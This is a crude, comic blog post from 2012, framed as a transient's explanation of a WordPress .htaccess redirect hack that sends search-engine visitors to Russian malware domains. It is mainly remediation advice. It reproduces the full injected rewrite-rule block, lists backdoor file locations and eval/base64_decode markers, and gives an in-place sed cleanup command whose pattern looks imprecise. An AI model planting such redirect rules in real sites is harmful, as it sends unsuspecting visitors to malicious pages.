Sunday, July 22, 2012

A Transient in a Greyhound bus station explains the 2014reltimes.ru 301 redirect

Greetings Arkham. Given the tragedy perpetrated this week by a psychopath using my moniker, I've decided to defer today's political tirade in favor of news from a transient I met during one of my more recent "escapes". We both had a 6 hour lay-over in a Greyhouse bus station when the topic came up regarding the 301 redirect hack plaguing WordPress users these days. Well, one thing led to another, so for a bottle of Jack and a little weed, I gave him a laptop and let him figure out this 2014reltime.ru 301 redirect thing. IT is not my forte...I'm more of a mayhem kind of guy and took his word for it. Below is what he wrote...before he got drunk and passed out, that is. So I'll pass on my usual social commentary out of respect....unlike the rest of those crazy satire writers out there anxious to be "timely". Funny I'm locked up as "crazy", and these fuckers are running amok at the keyboard with as much empathy as a serial killer and less ad revenue.  Just goes to show: crazy is relative and some people just don't get comedy anymore.  AH, HA, HAA, HAAA! Now that's funny....




A Transient in a Greyhound bus station explains the  2014Reltime.ru 301 redirect.



I don’t know anything about computers, OK?  But, they tell me you think you have a 301 redirect in the .htaccess file to http://2014-reltimes.ru/tyorem?13?  If a search user clicks on your link to the website in the Google search results and they are warned the website has been infected, you probably do. And there goes your traffic. A lot of the time, the first indication of being infected is seeing your traffic plummet (for reasons other than lame content, that is). Now that your site is in Google’s blacklist, you’ll need to request a malware review. Pissed off yet?
If this reminds you of the kirm-sky.ru attack from a couple of years ago, you need a hobby, but you’d be correct. Compromised sites redirect search engine traffic to malicious sites. The “rest” traffic is not affected, which helps hide the problem from webmasters who don’t really click on search results to open their own sites. So what does the .htaccess looks like? Hackers inject the following rewrite rules into .htaccess files:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*tellmewherethepornis.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*iamalittleteapot.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*reefermadness.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*ya.* [OR]
RewriteCond %{HTTP_REFERER} .*strangleCorp.* [OR]
RewriteCond %{HTTP_REFERER} .*aport.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://networkdevision .ru/targetfile/index.php [R=301,L]
To hide these rules, the bastards usually inject several screens of blank lines before the malicious code forcing you to you scroll all the way down to find anything suspicious in the .htaccess files. They might even place this file above the site root.
Those RewriteCond lines check if a visitor came from one of those sites ( Google, Yahoo, Wikipedia, YouTube, Twitter, Flickr, PornBonanza etc) and redirects them (the last RewriteRule line) to a malicious site. URLs of the malicious sites change quite often, but they all follow this pattern: Numbnuts.ru/dir/index.php where Numbnuts.ru is some malicious damned domain that needs to be kicked in the nuts. As you can see with the “ru” extension in http://2014-reltimes.ru/tyorem?13, those assholes live in Russia.  Sucuri could have told you that, but where's the thrill in that?



The domains are registered in small batches but you can you can identify them by similar names because the architects of this scam are just that unimaginative. They change domain names of the malicious sites as well as the IP addresses of servers with the malicious content after people complain and network administrators disconnect their servers. But, they just move on to the next one and diversify their infection methods like a crack whore.  Most times, the creation day of these domains is only mere days before you got the cyber-clap anyway.




Sometimes hosting providers try to temporarily shut down websites and redirect visitors to a page that usually tells you the site is temporarily unavailable. But, the redirect has a lower priority than the malicious redirect in .htaccess files. So, in spite of your best efforts, such disabled sites are still dangerous if people click on their links. The same way a dead snake can still kill you. If you delete the .htacecss file, it re-appears faster than someone you owe money. Then it breaks your permalinks like a bookie breaks knee caps. So you limp back in, re-save the permalinks and fix the problem…only to have new htaccess file being created immediately.  You might also notice that your ftp server, although closed, is running from the task manager and you can’t shut it. Son-of-a-bitch!

What is this thing doing? First it harshes your buzz, then the .htaccess is modified to redirect users to some Russian site. Finally, a backdoor is created. It can be inside /js/conf.php and at   /flops.php if it’s an osCommerce site. Try removing the file_manager.php from the admin directory. If it’s a WordPress hack find the file _cache.php and erase it (like maybe wp-content\upload\_cache.php). In some cases, the redirect code can be in any of your PHP files. In this case, search for the following keywords: eval, base64_decode.
Go to the WordPress install directory and look at any .php file since this crappy hack puts code right at the beginning of all the files with letters that go on and on ...

They are a command, encoded to hide it. Base64_decode will decode the letters into the command (the redirect), and “eval” will run it. The easiest way I’ve heard of to fix this is by logging into your server, if you have shell access, changing to the wordpress directory, then running this command:  find . -iname "*.php" -exec sed -i "s/^..php .\*\*. eval.base64_decode.\"aWYoZnVuY[^>]*>//" {} \;
This bit of code looks for all .php files in the current directory, searches them for the malicious code, then kicks its ass. It should not interfere with any other code...unless the code wants to be interfered with, that is, then it’s consensual. 


If that’s too complex or you don’t have shell access, try erasing all the .htaccess files and replacing them with new empty ones. That MIGHT work. Also to prevent this try placing all your authentication files above the root directory so they cannot be accessed by browser. Otherwise visit any of the assorted help forums on the web addressing this issue (unless their traffic is being redirected, too). You are not alone and some of these people actually know stuff like here: http://25yearsofprogramming.com/blog/20070705.htm. As for me, I’m just a transient in a bus station wasting time. What in the hell are you listening to me for anyway?
                                                                                            


No comments: